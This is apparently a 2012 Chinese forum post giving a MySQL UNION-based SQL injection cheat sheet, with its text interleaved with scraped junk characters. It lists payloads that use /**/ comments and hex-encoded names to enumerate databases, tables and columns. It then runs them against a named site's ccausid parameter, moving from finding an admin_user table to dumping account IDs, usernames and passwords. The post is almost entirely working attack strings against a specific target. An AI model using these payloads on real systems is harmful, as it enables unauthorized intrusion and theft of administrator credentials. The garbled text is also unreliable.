查库- Q5 {$ u* s/ a/ ?4 F* o4 i1 M) x0 b
4 ?5 r- L* S, A E) `
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
. V/ w2 C) J- r: N4 [
/ ^: ^ U. U+ C; ~2 R, E( Q查表
' G2 i4 |! M! Y) x) V9 m; s4 p* Q/ P+ e3 K3 H( z$ m; f
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,12 ~0 X; }" a1 L9 G) |: J6 k6 j
. b/ W, a' q. z" W- _2 _查段
: H5 t5 z# t) i9 Z2 N2 s/ j6 m7 R9 }6 \. q& e' u* R
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1$ w9 k+ n' I! ?/ q- C j+ h& C4 B
% |- U/ ?0 ?; X* d/ X8 v
4 e0 o3 e0 Q4 Z1 {mysql5高级注入方法暴表
. f) e' G; U! h0 q1 L9 u" w
6 d7 b3 A- |6 `! f+ B! J% X例子如下:# O0 a+ d) ?: Q+ V: @
% X/ e/ b( p* I8 U
1.爆表9 w% L; u c" C8 U- \
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)7 N! w# n6 w9 P* u+ x
这样爆到第4个时出现了admin_user表。# G N2 b/ y: c. `6 Q' n$ D
: ?( I" L, b( h0 Y! n* n, M2.暴字段
4 Q; N; c) r. H9 o. j0 chttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*9 T4 {, j9 _2 r: `2 f: V
" A) f: `4 b, d0 w4 o
6 a z: J$ a) i3 u0 }, c! |3.爆密码+ B8 o; D& ~8 N4 P, N
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
0 V. u$ Y9 }* I( t/ b
3 u! a. m- W/ \. j4 T$ f; T9 X/ w c
|
发表于 2012-9-13 16:29:37
收藏
支持
反对